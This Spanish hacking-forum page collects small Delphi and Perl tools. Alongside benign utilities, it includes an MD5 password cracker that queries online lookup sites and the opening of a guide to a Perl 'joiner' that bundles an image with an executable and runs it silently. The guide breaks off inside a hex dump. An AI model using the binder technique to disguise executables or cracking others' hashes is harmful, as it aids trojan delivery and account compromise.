Temas

Un simple programa para crackear un hash MD5 hecho en Delphi.

Una imagen :



El codigo :

Código (delphi) [Seleccionar] Expandir


// MD5 Cracker 0.1
// Coded By Doddy H
// Based on the services :
// http://md5.hashcracking.com/
// http://md5.rednoize.com
// http://md52.altervista.org

unit md5;

interface

uses
  Windows, Messages, SysUtils, Variants, Classes, Graphics, Controls, Forms,
  Dialogs, sSkinManager, StdCtrls, sButton, sEdit, sGroupBox, jpeg, ExtCtrls,
  ComCtrls, sStatusBar, IdBaseComponent, IdComponent, IdTCPConnection,
  IdTCPClient, IdHTTP, PerlRegEx;

type
  TForm1 = class(TForm)
    sSkinManager1: TsSkinManager;
    Image1: TImage;
    sGroupBox1: TsGroupBox;
    sEdit1: TsEdit;
    sGroupBox2: TsGroupBox;
    sEdit2: TsEdit;
    sGroupBox3: TsGroupBox;
    sStatusBar1: TsStatusBar;
    Crack: TsButton;
    sButton1: TsButton;
    sButton2: TsButton;
    sButton3: TsButton;
    IdHTTP1: TIdHTTP;
    PerlRegEx1: TPerlRegEx;
    procedure sButton2Click(Sender: TObject);
    procedure sButton3Click(Sender: TObject);
    procedure CrackClick(Sender: TObject);
    procedure sButton1Click(Sender: TObject);
    procedure FormCreate(Sender: TObject);
  private
    { Private declarations }
  public
    { Public declarations }
  end;

var
  Form1: TForm1;

implementation

{$R *.dfm}

procedure TForm1.CrackClick(Sender: TObject);
var
  rta: string;

begin

  sStatusBar1.Panels[0].text := '[+] Searching in md5.hashcracking.com ...';
  Form1.sStatusBar1.Update;

  rta := IdHTTP1.Get
    ('http://md5.hashcracking.com/search.php?md5=' + sEdit1.text);

  PerlRegEx1.Regex := 'Cleartext of (.*) is (.*)';
  PerlRegEx1.Subject := rta;
  if PerlRegEx1.Match then
  begin
    sEdit2.text := PerlRegEx1.SubExpressions[2];
    sStatusBar1.Panels[0].text := '[+] Done';
    Form1.sStatusBar1.Update;
  end
  else
  begin

    sStatusBar1.Panels[0].text := '[+] Searching in md5.rednoize.com ...';
    Form1.sStatusBar1.Update;

    rta := IdHTTP1.Get('http://md5.rednoize.com/?q=' + sEdit1.text);

    PerlRegEx1.Regex := '<div id=\"result\" >(.*)<\/div>';
    PerlRegEx1.Subject := rta;
    if PerlRegEx1.Match then

    begin

      if not(Length(PerlRegEx1.SubExpressions[1]) = 32) then
      begin
        sEdit2.text := PerlRegEx1.SubExpressions[1];
        sStatusBar1.Panels[0].text := '[+] Done';
        Form1.sStatusBar1.Update;
      end
      else

      begin

        sStatusBar1.Panels[0].text :=
          '[+] Searching in md52.altervista.org ...';
        Form1.sStatusBar1.Update;

        rta := IdHTTP1.Get
          ('http://md52.altervista.org/index.php?md5=' + sEdit1.text);

        PerlRegEx1.Regex :=
          '<br>Password: <font color=\"Red\">(.*)<\/font><\/b>';
        PerlRegEx1.Subject := rta;

        if PerlRegEx1.Match then
        begin
          sEdit2.text := PerlRegEx1.SubExpressions[1];
          sStatusBar1.Panels[0].text := '[+] Done';
          Form1.sStatusBar1.Update;

        end
        else
        begin
          sEdit2.text := '';
          sStatusBar1.Panels[0].text := '[-] Not Found';
          Form1.sStatusBar1.Update;
        end;
      end;

    end;
  end;

end;

procedure TForm1.FormCreate(Sender: TObject);
begin
  sSkinManager1.SkinDirectory := ExtractFilePath(Application.ExeName) + 'Data';
  sSkinManager1.SkinName := 'neonnight';
  sSkinManager1.Active := True;
end;

procedure TForm1.sButton1Click(Sender: TObject);
begin
  sEdit2.SelectAll;
  sEdit2.CopyToClipboard;
end;

procedure TForm1.sButton2Click(Sender: TObject);
begin
  ShowMessage('Contact to lepuke[at]hotmail[com]');
end;

procedure TForm1.sButton3Click(Sender: TObject);
begin
  Form1.Close();
end;

end.

// The End ?


Si quieren bajar el programa lo pueden hacer de aca.

Un simple script para scannear un archivo mediante el API de virustotal , la idea se me ocurrio cuando vi este script en python hecho por Sanko del foro Underc0de.

Una imagen :

Código (perl) [Seleccionar] Expandir


#!usr/bin/perl
#VirusTotal Scanner 0.1
#Coded By Doddy H
#ppm install http://www.bribes.org/perl/ppm/JSON.ppd
#ppm install http://trouchelle.com/ppm/Digest-MD5-File.ppd
#ppm install http://www.bribes.org/perl/ppm/Crypt-SSLeay.ppd
#ppm install http://trouchelle.com/ppm/Color-Output.ppd

use JSON;
use Digest::MD5::File qw(file_md5_hex);
use LWP::UserAgent;
use Color::Output;
Color::Output::Init;

my $nave = LWP::UserAgent->new;
$nave->agent(
"Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.12) Gecko/20080201Firefox/2.0.0.12"
);
$nave->timeout(5);

my $api_key = "yourapi"
  ;    #Your API Key

head();

unless ( $ARGV[0] ) {
    printear( "[+] Sintax : $0 <file to scan>", "text", "11", "5" );

    copyright();
    exit(1);
}
else {

    unless ( -f $ARGV[0] ) {
        printear( "\n[-] File Not Found\n", "text", "5", "5" );
        copyright();
    }

    my $md5 = file_md5_hex( $ARGV[0] );

    printear( "\n[+] Checking ...\n", "text", "7", "5" );

    my $code = tomar(
        "https://www.virustotal.com/vtapi/v2/file/report",
        { "resource" => $md5, "apikey" => $api_key }
    );

    if ( $code =~ /"response_code": 0/ ) {
        printear( "\n[+] Not Found\n", "text", "7", "5" );
        exit(1);
    }

    my $dividir = decode_json $code;

    printear( "[+] Getting data ...\n", "text", "7", "5" );

    printear( "[+] Scan ID : " . $dividir->{scan_id},     "text", "13", "5" );
    printear( "[+] Scan Date : " . $dividir->{scan_date}, "text", "13", "5" );
    printear( "[+] Permalink : " . $dividir->{permalink}, "text", "13", "5" );
    printear(
        "[+] Virus Founds : " . $dividir->{positives} . "/" . $dividir->{total},
        "text", "13", "5"
    );

    printear( "\n[+] Getting list ...\n", "text", "7", "5" );

    my %abrir = %{ $dividir->{scans} };

    for my $antivirus ( keys %abrir ) {

        if ( $abrir{$antivirus}{"result"} eq "" ) {
            printear( "[+] " . $antivirus . " : Clean", "text", "11", "5" );
        }
        else {
            printear(
                "[+] " . $antivirus . " : " . $abrir{$antivirus}{"result"},
                "text", "5", "5" );
        }
    }

    printear( "\n[+] Finished\n", "text", "7", "5" );
    copyright();

}

sub head {
    printear( "\n-- == VirusTotal Scanner 0.1 == --\n", "text", "13", "5" );
}

sub copyright {
    printear( "\n[+] Written By Doddy H", "text", "13", "5" );
    exit(1);
}

sub printear {
    if ( $_[1] eq "text" ) {
        cprint( "\x03" . $_[2] . $_[0] . "\x030\n" );
    }
    elsif ( $_[1] eq "stdin" ) {
        if ( $_[3] ne "" ) {
            cprint( "\x03" . $_[2] . $_[0] . "\x030" . "\x03" . $_[3] );
            my $op = <stdin>;
            chomp $op;
            cprint("\x030");
            return $op;
        }
    }
    else {
        print "error\n";
    }
}

sub tomar {
    my ( $web, $var ) = @_;
    return $nave->post( $web, [ %{$var} ] )->content;
}

#The End ?


Un simple script para subir imagenes a Imageshack.

El codigo :

Código (perl) [Seleccionar] Expandir


#!usr/bin/perl
#Imageshack Uploader 0.1
#Coded By Doddy H
#ppm install http://www.bribes.org/perl/ppm/Crypt-SSLeay.ppd

use LWP::UserAgent;

my $nave = LWP::UserAgent->new;
$nave->agent(
"Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.12) Gecko/20080201Firefox/2.0.0.12"
);
$nave->timeout(5);

head();

unless ( $ARGV[0] ) {
    print "\n[+] Sintax : $0 <image>\n";
}
else {

    my $your_key = "YOURKEY";    #Your API Key

    print "\n[+] Uploading ...\n";

    my $code = $nave->post(
        "https://post.imageshack.us/upload_api.php",
        Content_Type => "form-data",
        Content      => [
            key        => $your_key,
            fileupload => [ $ARGV[0] ],
            format     => "json"
        ]
    )->content;

    if ( $code =~ /"image_link":"(.*?)"/ ) {
        print "\n[+] Link : " . $1 . "\n";
    }
    else {
        print "\n[-] Error\n";
    }
}

copyright();

sub head {
    print "\n-- == Imageshack Uploader 0.1 == --\n";
}

sub copyright {
    print "\n[+] Written By Doddy H\n";
}

#The End ?


Traduccion a Perl del programa hecho por $DoC llamado AnonFiles Uploader hecho para subir archivos a la pagina AnonFiles.

Código (perl) [Seleccionar] Expandir


#!usr/bin/perl
#AnonFiles Uploader
#Original author: $ DoC
#Translations made by Doddy H
#
#ppm install http://www.bribes.org/perl/ppm/Crypt-SSLeay.ppd
#

use LWP::UserAgent;

my $nave = LWP::UserAgent->new;
$nave->agent(
"Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.12) Gecko/20080201Firefox/2.0.0.12"
);
$nave->timeout(5);

unless ( $ARGV[0] ) {
    print "\n[+] Sintax : $0 <file>\n";
}
else {

    print "\n[+] Uploading ...\n";

    my $code = $nave->post(
        "https://anonfiles.com/api?plain",
        Content_Type => "form-data",
        Content      => [ file => [ $ARGV[0] ] ]
    )->content;

    if ( $code =~ /https:\/\/anonfiles\.com\/file\// ) {
        print "\n[+] Link : " . $code . "\n";
    }
    else {
        print "\n[-] Error\n";
    }

}

#The End ?


Un simple reproductor de musica que hice basado en este articulo.

Una imagen :



El codigo :

Código (delphi) [Seleccionar] Expandir


// DH Player 0.1
// Coded By Doddy H
// Based on this article : http://delphi.about.com/od/multimedia/l/aa112800a.htm

unit mp3player;

interface

uses
  Windows, Messages, SysUtils, Variants, Classes, Graphics, Controls, Forms,
  Dialogs, Menus, StdCtrls, sListBox, sSkinManager, MPlayer, sGroupBox, jpeg,
  ExtCtrls, ComCtrls, acProgressBar, Buttons, FileCtrl, sEdit;

type
  TForm1 = class(TForm)
    sSkinManager1: TsSkinManager;
    sGroupBox1: TsGroupBox;
    sListBox1: TsListBox;
    sGroupBox2: TsGroupBox;
    MediaPlayer1: TMediaPlayer;
    Image1: TImage;
    sGroupBox3: TsGroupBox;
    sProgressBar1: TsProgressBar;
    PopupMenu1: TPopupMenu;
    L1: TMenuItem;
    R1: TMenuItem;
    A1: TMenuItem;
    E1: TMenuItem;
    Directory: TsGroupBox;
    sEdit1: TsEdit;
    Timer1: TTimer;
    procedure A1Click(Sender: TObject);
    procedure E1Click(Sender: TObject);
    procedure R1Click(Sender: TObject);
    procedure L1Click(Sender: TObject);
    procedure Timer1Timer(Sender: TObject);
    procedure sListBox1DblClick(Sender: TObject);
    procedure FormCreate(Sender: TObject);

  private
    { Private declarations }
  public
    { Public declarations }
  end;

var
  Form1: TForm1;

implementation

{$R *.dfm}

procedure TForm1.A1Click(Sender: TObject);
begin
  ShowMessage('Contact to lepuke[at]hotmail[com]');
end;

procedure TForm1.E1Click(Sender: TObject);
begin
  Form1.Close();
end;

procedure TForm1.FormCreate(Sender: TObject);
begin
  sProgressBar1.Max := 0;
  sSkinManager1.SkinDirectory := ExtractFilePath(Application.ExeName) + 'Data';
  sSkinManager1.SkinName := 'fm';
  sSkinManager1.Active := True;
end;

procedure TForm1.L1Click(Sender: TObject);
var
  dir: string;
  search: TSearchRec;
  cantidad: Integer;

begin

  SelectDirectory('Select a folder', '', dir);

  sListBox1.Clear;

  sEdit1.Text := dir;
  cantidad := FindFirst(dir + '/' + '*.*', faAnyFile, search);

  while cantidad = 0 do
  begin
    if FileExists(dir + '/' + search.name) then
    begin
      sListBox1.Items.Add(search.name);
    end;
    cantidad := FindNext(search);
  end;
  FindClose(search);

end;

procedure TForm1.R1Click(Sender: TObject);
begin
  sEdit1.Text := '';
  sProgressBar1.Max := 0;
  sListBox1.Clear;
end;

procedure TForm1.sListBox1DblClick(Sender: TObject);
begin

  sProgressBar1.Max := 0;

  MediaPlayer1.Close;
  MediaPlayer1.FileName := sEdit1.Text + '/' + sListBox1.Items.Strings
    [sListBox1.ItemIndex];
  MediaPlayer1.Open;

  sProgressBar1.Max := MediaPlayer1.Length;
end;

procedure TForm1.Timer1Timer(Sender: TObject);
begin
  if sProgressBar1.Max <> 0 then
    sProgressBar1.Position := MediaPlayer1.Position;
end;

end.

// The End ?


Si lo quieren bajar lo pueden hacer de aca

Siempre habia querido hacer un programa para hacer un whois en delphi pero en ese entonces no conocia delphi lo suficiente como para poder hacerlo , hoy me tome unos 10 min libres y logre hacer uno , para hacerlo instale indy y escribi unas pocas lineas para hacerlo.

Una imagen :



El codigo (muy corto xD)

Código (delphi) [Seleccionar] Expandir


// GetWhois 0.1
// Coded By Doddy H in the year 2013

unit whois;

interface

uses
  Windows, Messages, SysUtils, Variants, Classes, Graphics, Controls, Forms,
  Dialogs, StdCtrls, sMemo, sButton, sEdit, sLabel, sGroupBox, sSkinManager,
  IdBaseComponent, IdComponent, IdTCPConnection, IdTCPClient, IdWhois, ComCtrls,
  sStatusBar, jpeg, ExtCtrls;

type
  TForm1 = class(TForm)
    sSkinManager1: TsSkinManager;
    sGroupBox1: TsGroupBox;
    sLabel1: TsLabel;
    sEdit1: TsEdit;
    sButton1: TsButton;
    sGroupBox2: TsGroupBox;
    sMemo1: TsMemo;
    IdWhois1: TIdWhois;
    sStatusBar1: TsStatusBar;
    Image1: TImage;
    procedure sButton1Click(Sender: TObject);
    procedure FormCreate(Sender: TObject);
  private
    { Private declarations }
  public
    { Public declarations }
  end;

var
  Form1: TForm1;

implementation

{$R *.dfm}

procedure TForm1.FormCreate(Sender: TObject);
begin
  sSkinManager1.SkinDirectory := ExtractFilePath(Application.ExeName) + 'Data';
  sSkinManager1.SkinName := 'garnet';
  sSkinManager1.Active := True;
end;

procedure TForm1.sButton1Click(Sender: TObject);
begin

  if sEdit1.text = '' then
  begin
    ShowMessage('Write the domain');
  end
  else
  begin
    sStatusBar1.Panels[0].text := '[+] Searching ...';
    Form1.sStatusBar1.Update;

    sMemo1.Clear;
    sMemo1.Lines.text := IdWhois1.whois(sEdit1.text);

    sStatusBar1.Panels[0].text := '';
    Form1.sStatusBar1.Update;
  end;
end;

end.

// The End ?


Si lo quieren bajar lo pueden hacer de aca.

Traduccion a Delphi de este programa para localizar una IP.

Una imagen :



El codigo :

Código (delphi) [Seleccionar] Expandir


// LocateIP 0.1
// Coded By Doddy H in the year 2013
// Based on the services :
// To get IP -- http://whatismyipaddress.com/
// To locate IP -- http://www.melissadata.com/
// To get DNS -- http://www.ip-adress.com/

unit locateip;

interface

uses
  Windows, Messages, SysUtils, Variants, Classes, Graphics, Controls, Forms,
  Dialogs, sSkinManager, jpeg, ExtCtrls, StdCtrls, sLabel, sGroupBox, sButton,
  sEdit, sListBox, ComCtrls, sStatusBar, IdBaseComponent, IdComponent,
  IdTCPConnection, IdTCPClient, IdHTTP, PerlRegEx, IdMultipartFormData;

type
  TForm1 = class(TForm)
    sSkinManager1: TsSkinManager;
    Image1: TImage;
    sGroupBox1: TsGroupBox;
    sLabel1: TsLabel;
    sEdit1: TsEdit;
    sButton1: TsButton;
    sGroupBox2: TsGroupBox;
    sLabel2: TsLabel;
    sEdit2: TsEdit;
    sLabel3: TsLabel;
    sEdit3: TsEdit;
    sLabel4: TsLabel;
    sEdit4: TsEdit;
    sGroupBox3: TsGroupBox;
    sListBox1: TsListBox;
    PerlRegEx1: TPerlRegEx;
    IdHTTP1: TIdHTTP;
    sStatusBar1: TsStatusBar;
    procedure sButton1Click(Sender: TObject);
    procedure FormCreate(Sender: TObject);

  private
    { Private declarations }
  public
    { Public declarations }
  end;

var
  Form1: TForm1;

implementation

{$R *.dfm}

procedure TForm1.FormCreate(Sender: TObject);
begin
  sSkinManager1.SkinDirectory := ExtractFilePath(Application.ExeName) + 'Data';
  sSkinManager1.SkinName := 'matrix';
  sSkinManager1.Active := True;
end;

procedure TForm1.sButton1Click(Sender: TObject);
var
  rta: string;
  z: integer;
  par: TIdMultiPartFormDataStream;
begin

  if sEdit1.text = '' then
  begin
    ShowMessage('Write the target');
  end
  else
  begin
    sStatusBar1.Panels[0].text := '[+] Getting IP ...';
    Form1.sStatusBar1.Update;

    par := TIdMultiPartFormDataStream.Create;
    par.AddFormField('DOMAINNAME', sEdit1.text);

    rta := IdHTTP1.Post('http://whatismyipaddress.com/hostname-ip', par);

    PerlRegEx1.Regex := 'Lookup IP Address: <a href=(.*)>(.*)<\/a>';
    PerlRegEx1.Subject := rta;

    if PerlRegEx1.Match then
    begin
      sEdit1.text := PerlRegEx1.SubExpressions[2];

      // Locating ...

      sStatusBar1.Panels[0].text := '[+] Locating ...';
      Form1.sStatusBar1.Update;

      rta := IdHTTP1.Get(
        'http://www.melissadata.com/lookups/iplocation.asp?ipaddress=' +
          sEdit1.text);

      PerlRegEx1.Regex := 'City<\/td><td align=(.*)><b>(.*)<\/b><\/td>';
      PerlRegEx1.Subject := rta;

      if PerlRegEx1.Match then
      begin
        sEdit2.text := PerlRegEx1.SubExpressions[2];
      end
      else
      begin
        sEdit2.text := 'Not Found';
      end;

      PerlRegEx1.Regex := 'Country<\/td><td align=(.*)><b>(.*)<\/b><\/td>';
      PerlRegEx1.Subject := rta;

      if PerlRegEx1.Match then
      begin
        sEdit3.text := PerlRegEx1.SubExpressions[2];
      end
      else
      begin
        sEdit3.text := 'Not Found';
      end;

      PerlRegEx1.Regex :=
        'State or Region<\/td><td align=(.*)><b>(.*)<\/b><\/td>';
      PerlRegEx1.Subject := rta;

      if PerlRegEx1.Match then
      begin
        sEdit4.text := PerlRegEx1.SubExpressions[2];
      end
      else
      begin
        sEdit4.text := 'Not Found';
      end;

      //

      // Get DNS

      sStatusBar1.Panels[0].text := '[+] Getting DNS ...';
      Form1.sStatusBar1.Update;

      sListBox1.Items.Clear;

      rta := IdHTTP1.Get('http://www.ip-adress.com/reverse_ip/' + sEdit1.text);

      PerlRegEx1.Regex := 'whois\/(.*?)\">Whois';
      PerlRegEx1.Subject := rta;

      while PerlRegEx1.MatchAgain do
      begin
        for z := 1 to PerlRegEx1.SubExpressionCount do
          sListBox1.Items.Add(PerlRegEx1.SubExpressions[z]);
      end;

      //

    end
    else
    begin
      sStatusBar1.Panels[0].text := '[-] Error';
      Form1.sStatusBar1.Update;
    end;

    sStatusBar1.Panels[0].text := '';
    Form1.sStatusBar1.Update;

  end;
end;

end.

// The End ?


Si lo quieren bajar lo pueden hacer de aca.

Un simple Joiner hecho en Perl.

Una imagen del generador :



Pueden bajar el programa desde aca.

[Guia] : Creacion de un Joiner en Perl
[Autor] : Doddy Hackman

-- == Indice == --

0x01 : Presentacion
0x02 : Desarrollo
0x03 : Compilacion
0x04 : Herramientas y Codigos finales

-- == ------ == --

0x01 : Presentacion

Ok , esta es una guia corta sobre como hacer un joiner en perl , la idea original se me ocurrio cuando lei este tutorial hecho por hecky neobits , la idea seria hacer lo mismo o algo parecido como esa guia que mostre , creo que esto es lo que me faltaba hacer en perl , bue , todavia me faltan un monton pero bue.

Cabe aclarar que nunca que hice un joiner porque lo que hare al estilo del manual que mostre.

Comencemos .........

0x02 : Desarrollo

Lo primero que necesitamos es bajar el archivo "joiner_manual.rar" de aca , una vez bajado lo descomprimimos y vemos que tenemos el instalador activeperl 5.8 con perl2exe + serial incluido , tambien veran los archivos "coraje.jpg" y "holamundo.exe" que seran los archivos que usaremos en el joiner ahora la idea es conseguir los bytes de los archivos que queremos poner en el joiner en este caso los archivos seran "coraje.jpg" y "holamundo.exe" , para eso pueden usar la herramienta hexnow.pl que esta en la parte "Codigos finales"

Solo con este comando :

Código (perl) [Seleccionar] Expandir


perl hexnow.pl -hex coraje.jpg


Con esto creamos un archivo de texto con los bytes de coraje.jpg , lo mismo hacemos con holamundo.exe de la siguiente manera :

Código (perl) [Seleccionar] Expandir


perl hexnow.pl -hex holamundo.exe


Una vez que conocemos los bytes de cada uno podemos empezar a codear el archivo joiner.pl :

Primero llamamos a los modulos necesarios de la siguiente manera :

Código (perl) [Seleccionar] Expandir


use Win32::Job;   #Modulo necesario para cargar comandos de forma silenciosa
use threads;      #Modulo necesario para cargar los dos archivos al mismo tiempo


Despues usamos los bytes de la siguiente forma :

Código (perl) [Seleccionar] Expandir


my $nombre_uno =
 "coraje_uno.jpg";    #Nombre que va a tener el archivo cuando se cree
my $nombre_dos = "holamundo_dos.exe";    # Lo mismo

my $valor_uno =
"ffd8ffe000104a46494600010101006000600000fffe001c536f6674776172653a204d6963726f736f6674204f6666696365ffdb0043000a07070807060a0808080b0a0a0b0e18100e0d0d0e1d15161118231f2524221f2221262b372f26293429212230413134393b3e3e3e252e4449433c48373d3e3bffdb0043010a0b0b0e0d0e1c10101c3b2822283b3b3b3b3b3b3b3b3b3b3b3b3b3b3b3b3b3b3b3b3b3b3b3b3b3b3b3b3b3b3b3b3b3b3b3b3b3b3b3b3b3b3b3b3b3b3b3b3b3bffc0001108012f010c03012200021101031101ffc4001c0001000300030101000000000000000000000506070103040208ffc4004910000104010203050602040c0405050000010002030405061112213107134151611422718191a132b1154252c11623243343627292a2d1e1f0173453c2358293b2f154555663d2ffc4001a010100030101010000000000000000000000010203040506ffc4002e1101000202010302030802030000000000000102031121041231324113229105142342516171b181a1c1e1f0ffdd00040028ffda000c03010002110311003f00d99111011110117cbded634b9ee0d681b924ec028abbab34f6377f6ccdd184b76ddaeb0de21bfa6fba0974545bbdb268ca80f75767b8edbf0c15ddcffbdb05053f6d562c9e1c4696b32f9496250c1d7c80fdea26623994c566de21aba2c3323da46b199a5d63258ec3467f561883dfb6dfd6dfeca0e3ed4f51e32e366ad9d9f20d07de8edc2deede3ec47cb654ae4ada785ed8ed58ddb87e8f4550d0dda1e335a562c60f65c8443792abddb923f69a7c47e5e2adeb466222202222022220222202228ecde7b19a771efbf95b4caf037a171e6f3e4d1d49f40824542e7757e034d309cae4a181fb6e21078a43f068e6b25cff006bf6f3b23ebe36e1c1d2dc832005d6251f103667cb9faaaa4394d3d55ee9819279c9ddd2c8d2f7b8f9ee563932f6f1159996d8f177733688869591ed96cd9ddba734ecd334fe19eebb81a7ff0028ebcffaca02deaed7d9327bccc57c7464efddd4846e39f99dcfdd55e5d6555bbf755657f97110dff35e19f595a77282b471fab89715cd37eaade2ba74c53a5a7aadb59258331706d7f5465ec0278b87da5c1bbf981b90147dec5629803f257a691e07274f6097155ab19fc9d9043edbc34f833ddfc9785ac96c4c18c6be591e79000b892ad5c39e7d77fa22d9f047a29f54fcd99a545a23c658c81e03ee96d97b1a3d40ebf92f769dd6fae9f9682a62f2f76e4f349b3219dc670ef8f1efb0dbe9d57b34d763fa973a592db8862eabbabec8f7c8f4675faecb6cd25a130ba3abed421ef2cbda04b6a5e6f7fc3f647a05d75af6c6b6e4bdfba77ad2c31779dd33bde1ef3847170f4dfc76f45f688aca08888322c9f6f104571f5f1d847bc35e5bde5a9bbbdf6f368076f995d47b5ed4b6cb4d0c3e280f1e2b264fc88d94aebeec86bea0b12e570924752fbfde92270da298f9f2fc2e3e7d0fdd62b99d359bd3964c394c7cf55c3a3c8dd8ef838723f555b45a7d32b566b1ea869b675febeb25c2297174dae3c8c711716ff7b75153e575bdd27da7564f102ee2dab8e0ff00dbb7d1670cb96a31b4762560feabc847ddb520d9f66570f22f256134cf3f9a3e8de2f823f24fd572b787f68777994ce5bb07ce69bc0fc495e3756d2f477e391b33bcb8cbff002e4aa8e739c777389f895c28f8179f55e7fa5be3d23d348fed677ea4c6d40463f1ad07f69cd0dfc9475bd4b92b5b813085be510dbefd5448049d80dc9561c2681d4fa8385d43133774efe9a51ddb3eaeebf2dd5ebd3e3af3adff003cb3b75192dc6f5fc2bef7b9ee2e7b8b89ea49dd7a6a632fde8679aa539e78eb338e67c719708dbe648e8b65d37d84d4aee6cfa8af7b53873f67adbb59f371e67e5b2d4e86328e2ea36a50a90d6aed1b08e36068ff0055bb07e43a772ce3ee456e9ccf82785c1d1c8c3b1695fa4fb3ad7f5f59e2fbb9dcc8b2b5dbfca210360e1bec1edf4e9bf91f9285d79d9052cd89323816c74f207de7c3d2298ffda7ec7c7cd62d8fbd97d1ba8d96236c956f539367c4f046fe6d70f10507eb64513a675152d5382832b48fb928d9f193b98de3ab4fa8ff00252c808baacd986a40f9ec48d8e3634b9ce71d80006e5615a33b57bf57534d5f256e3388b766494bac924d70e25dee9037f96df441bd22a9ff00c50d13ff00dfe0fee3ff00fe57b2aebdd277783b8d4140979d9ad7cc187e8ed8a0f8d6dac2a68cc21bd38124f238320837e723bc7e4073ff00e54e52b906428c172b3c3e19e36c91b87882370b30ed8f49bb5062a1d478b90587d28c8958c7f10745d789bf0ebf03e8a17b24ed22be2eb7f07f3965b15666eea961e7933c4b09f01e23e63c906b5a8f51e3b4be224c964a5e08d9c98c1f8a477835a3c4afce19dce6a0ed1f5182d8259e43b8af4e105cd89be9fbc953b96b999ed835a8a98e6ba3a1012220ff00c1047e323bd4f97c02dab4a68ec4690c78ad8e8077ae03beb0f1bc929f53e03d07241f9faef659ad28825f8496668db9c0f6c9f60775e2fe00eaefff001cc8ff00e8397eac441f98eaf64fad6d6db619d102ddc1965637f7efba9ea1d83ea29c8376fd1aad3b6fc25d2387cb603eeb7e4419862fb09d3f54b5f91bd6ef38756822261fa73fbabd61f4ce0f00ddb158bad5491b17b19ef1f8b8f32a551011110111101111017c4b0c53c6629a3648c7756bda083f22bed1054f23d97e8dc9b9cf970b0c4f77575773a2f1dfa3481f65073f617a4e473dd1cd91878ba06ccd21bf56eff75a4220cc61ec1f4cb37ef6f64a4f2da46376ff000a92a9d8ce8babc3de529ec96efb99ac3bdef8f0ecaf88821f19a4b4f618838ec3d481c06dc62205dfde3cfeea61110111101523b47ecfabeb0c61b15238e2cbc0378653cbbd1fb0e3f91f03e9baba4b2c7042f9a691b1c71b4b9ef79d8340e6493e016479ad699ad7b929b09a4a4752c5c476b1913b873c7f57c403b1d8753e3b0dd1311333a87fffd0a9f675ad2e689cbdba53d3b36629c163a9c6df7c4cde4391e9e20ffa2d08e5bb41d45b3b8eb69ba8ee8d6b7bd9c83e7bf21f62bd1a7749e2b4d41c34e1e29c8f7ec49b17bbe7e03d028dd5baf2a605aea5476b9947fbad899ef08cf8716de3e9d54e9d5186b58dde54bed160a58d11d2932377299590f1cb35ab05fdd37c006f404fe5bf985eaecf7198ca179f5350e3cc590b6c6beab6e41ee3e3237f777e5b9fddf1565d05d9759b7786a5d5e1cfb2f7f7b1d4939927c1d27ee6f86dcfc968baa74c51d55877d1b6d0d907bd5e703de824f0703fbbc5431ef88b6e210a29540361561007ff00ac2f3dac1e22e8dad632a4db8db77c2d276f8eca334ae52ecbed784cc0232b8b7f77313fd2b7f55e3e23f71f156256775662d1b50339a4e8bf3b8dc060993529b26f71b62099c18201f8c96efb7c3c39297d51d87636ff00f1fa7ec0c7ca1a01825ddd1388f1dfab4fd54a68b8064b5ee7b2cf00b68b23a301db90fd67fcf7dbeaaf966cc14eb4966d4d1c10c4de27c923835ad1e649e8aae0c931369d314d3d80ed23b3a7d9763f0f53215a520ca18e6b8bb6076db987fcba2b7698ed2f29a8ebfb445a3ee490890c6e92ad88de1ae1b7221dc3b75579a190a794a8cb742d4566bc9f86589e1cd3f30b3e89bfc09ed6bb90eeef15a9da5cd6feab2c83fbc9ff0018f24517ec7dcb56dae363193d1dba099f1b89fee39cbd888808888088880888808888088880888808888088b8dd0728888088bc19cc9c785c1ddc9cbb16d481f2edbfe2206e07ccf2419b76939abba9b3f1e84c349c11f2932338e61a391e13e8391f524053b8bc4d5c1e2d9471d035ac8c720e3b17bbc4b8edd4f9aaef6758a922c4cb9cba0bafe5a474f23ddd7849247d7727e615c15a1dd869db1b952b5a8d47160ee5d765e0a156166e23ab1b8be424800179208e67a80ae5a2bb3ec369aa35ad9a6d972af89ae9eccc78dc1e46eee1f06f3dfa73f52a035931b62be2293da5d1dccb5685fb750d2edcfe4b4e512c33fa9cae170f77046e7904f08df6039ac1f45eb1a2ccacd91bb2caed41772f1b1bcdc43ebbc869675db66efbec7c9bd7650c178ed028b70d9dc66ae8470b43c53bfb7eb46fe4d71f81fdca554aeadc58cce93c9e3c804cd59e19bfed01bb7ee02a9e93c83b29a5b1d71ff8df080f3e65bee93f50a61d7d3dbcc3d7d9680fc7672770de493336039de607080babb699678fb3c9c425c1b25889b2ec3f577df9f97301767652f69c4e6d81c0b9b9ab3b8df98df855ab3b85a7a870d67157d85d5ecb785dc2762d3bee08f50403f250e59f2a4f64faa1fa9a5cbbc57f668608eab5b1076e03846e6b9c3978f037e817afb5fa52bf47b32b57716b116a3b51b8751cf84fe60f87e152ba2343d1d1142c57ab3c9664b3207cb348d009d86c06c3c06e7ea57a75bc0db3a1b391b99c7fc826701fd60c247dc0442531f71991c6d5bd16dc166164add8efc9c011cfe6bd2ab3d9c5af6cecf70b29938f86b08f7fec12ddbe5c3b7c95990111105533faf20c3e59d89a58bb995bb146249e3ac06d0b4f4e227c4f928e1da6b72ec8a0d338c92e5b7378ac0b44c31d4e7b6cf3b1dddc8f21f151b6dffa0fb4ac9576f0da6e5d8db0d111e27c0e6b76da403f0b4f8150fa6b506524c96484b8c0e01ae9a48a08831fc6361b73ea4ede3cd695c736acda3d9bd31d66226656ec16b6ca0d4b0e9fd4b4aac362db1cfab629b9c62936dc9690ee6080af0b3ed198419ec941acf23621964631d1d3ab0925b5ba877193d64e641e436fa2d0566cadadf022222a22220222202222084d656f214348652d62da4dc8abb9d1edd47991ea06e7e4b36c2e060ab82ad9fc666678727244d99d725b04b2579e65af04ec5bbee0f8abdeb9d4b674fd3a30526c62de4ac8ad14b30de38b7eae3e7e8151b37a560a9a7bb86e5190bbda0cef758708e37bddd7668e4df4002bd2226da99d436c55dee6612190cfeb5cd6224c957b10e023ad197b606b44cf98b46e4971e41a76e402bb68cccd8d41a471d95b7188e7b116f20036048246e3d0edbfcd67789c465b2763f817dfb6b54ad1096e590fde49a2713eec43c06fb827ff0085acd3a9050a70d3ad188e0818238d83a35a06c028b4444ea15bc5638877aa7f6acf737b3cc8b1b2b6274ce862e271d86ce95a0fdb7523ac756d2d1f8575fb23bd95c782081a7674aff2f8799540a581ca6ac9d999d6733a4e2f7a0c6025b1423c371e7e87e7e4aa8a526d3a84de